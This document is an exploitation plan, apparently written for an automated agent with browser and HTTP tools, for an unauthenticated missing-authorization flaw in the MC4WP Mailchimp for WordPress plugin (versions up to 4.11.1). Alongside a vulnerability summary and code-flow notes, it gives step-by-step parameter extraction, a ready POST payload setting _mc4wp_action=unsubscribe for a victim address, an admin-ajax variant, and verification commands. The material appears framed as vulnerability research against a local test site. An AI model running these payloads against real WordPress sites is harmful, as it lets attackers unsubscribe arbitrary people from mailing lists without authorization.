MC4WP: Mailchimp for WordPress <= 4.11.1 - Missing Authorization to Unauthenticated Arbitrary Subscription Deletion

This research plan focuses on the Missing Authorization vulnerability in the MC4WP: Mailchimp for WordPress plugin, which allows unauthenticated attackers to unsubscribe any email address from a Mailchimp audience by manipulating the _mc4wp_action parameter in a form submission.

---

1. Vulnerability Summary

The vulnerability exists in the front-end form processing logic of the plugin. When a user submits a sign-up form, the plugin determines the action to take (e.g., subscribe, unsubscribe) based on the _mc4wp_action POST parameter. In affected versions (<= 4.11.1), the plugin fails to verify if the user is authorized to perform an unsubscribe action. Since the plugin is designed to allow unauthenticated sign-ups, it processes these requests globally. An attacker can craft a request that overrides the intended subscribe action with unsubscribe, effectively removing any known email address from the connected Mailchimp audience.

2. Attack Vector Analysis

• Endpoint: Any public-facing page where a Mailchimp for WordPress form is embedded.
• Method: POST
• Vulnerable Parameter: _mc4wp_action
• Required Authentication: None (Unauthenticated).
• Preconditions:
  1. The attacker must know the _mc4wp_form_id (publicly visible in the HTML source).
  2. The plugin must be connected to a valid Mailchimp API key.
  3. The victim's email address must already be subscribed to the audience associated with the form.

3. Code Flow (Inferred from Source & Behavior)

1. Entry Point: MC4WP_Form_Listener (referenced in autoload.php) is loaded and hooks into template_redirect, init, or wp_loaded to listen for form submissions.
2. Request Detection: The listener checks for the presence of the _mc4wp_form_id POST parameter.
3. Action Determination: The listener looks for _mc4wp_action.
   • If absent, it defaults to subscribe.
   • If present, it adopts the value provided in the request without checking permissions.
4. Logic Branching: The code passes the action to MC4WP_Form::execute($action, $data) or a similar processing method.
5. Sink: The plugin uses the MC4WP_API_V3 class (referenced in autoload.php) to communicate with the Mailchimp API. If the action is unsubscribe, it sends a request to Mailchimp to update the member's status to unsubscribed.

4. Nonce Acquisition Strategy

Mailchimp for WordPress forms are designed for high conversion and, by default, do not require a WordPress nonce for standard sign-ups. This is confirmed by config/default-form-content.php, which contains only the email field and the submit button.

However, the plugin employs some anti-spam measures:

1. Honeypot: A hidden field (often named _mc4wp_honeypot) that must be empty.
2. Timestamp: A hidden field _mc4wp_timestamp containing a Unix timestamp.

Strategy:

1. Navigate to a page containing the form.
2. Extract the _mc4wp_form_id from the hidden input.
3. Extract any anti-spam tokens (if present) from the HTML.
4. No JavaScript-localized nonce is required for this specific exploit.

5. Exploitation Strategy

The goal is to force an unsubscribe action on an existing subscriber.

Step-by-Step Plan:

1. Identify Form: Locate a page with an MC4WP form.
2. Extract Parameters: Using browser_navigate and browser_eval, extract the value of the hidden input _mc4wp_form_id.
3. Craft Payload:
   • _mc4wp_form_id: [Extracted ID]
   • _mc4wp_action: unsubscribe
   • EMAIL: [Target Email Address]
   • _mc4wp_timestamp: [Current Unix Timestamp] (optional, but recommended)
4. Execute Request: Use the http_request tool to send a POST request to the page URL.

Payload (URL-Encoded):

POST /target-page/ HTTP/1.1
Host: target.local
Content-Type: application/x-www-form-urlencoded

_mc4wp_form_id=123&_mc4wp_action=unsubscribe&EMAIL=victim@example.com&_mc4wp_timestamp=1738848000

6. Test Data Setup

1. API Connection: Connect the plugin to a Mailchimp account (or a mock API).
2. Create Form: Create a sign-up form via the plugin admin.
3. Placement: Add the form to a post/page using the [mc4wp_form] shortcode.
4. Add Subscriber: Manually add victim@example.com to the Mailchimp audience (ensure status is subscribed).
5. Enable Logging: In plugin settings, ensure "Logging" is enabled to verify the action.

7. Expected Results

• Response: The page should reload and likely display a success message associated with unsubscription (e.g., "You have been unsubscribed").
• Mailchimp State: The email victim@example.com should have its status changed from subscribed to unsubscribed in the Mailchimp Audience dashboard.
• Plugin Logs: The plugin's internal logs should show an unsubscribe event for the specified email.

8. Verification Steps

1. Database Check: Check the wp_posts table where post_type = 'mc4wp-form' to confirm the form ID existence.
2. Plugin Debug Log: Use wp-cli to read the MC4WP debug log (if defined in the settings or filesystem).
   • cat wp-content/uploads/mc4wp-debug.log (path may vary).
3. Mailchimp Verification: If possible, use MC4WP_API_V3 directly via wp eval to check the member status:

   wp eval '$api = new MC4WP_API_V3("YOUR_API_KEY"); print_r($api->get_subscriber("AUDIENCE_ID", "victim@example.com"));'
   

9. Alternative Approaches

• Gutenberg Block: If the standard shortcode is not used, target the form generated by the mailchimp-for-wp/form Gutenberg block.
• AJAX Submission: Some configurations use AJAX. If the form has the mc4wp-ajax class, the request should be sent to admin-ajax.php with action=mc4wp_submit_form.
  • Payload: action=mc4wp_submit_form&_mc4wp_form_id=[ID]&_mc4wp_action=unsubscribe&EMAIL=[EMAIL]
• Different Actions: Test if other actions like delete are supported by the _mc4wp_action parameter, although unsubscribe is the most common for front-end listeners.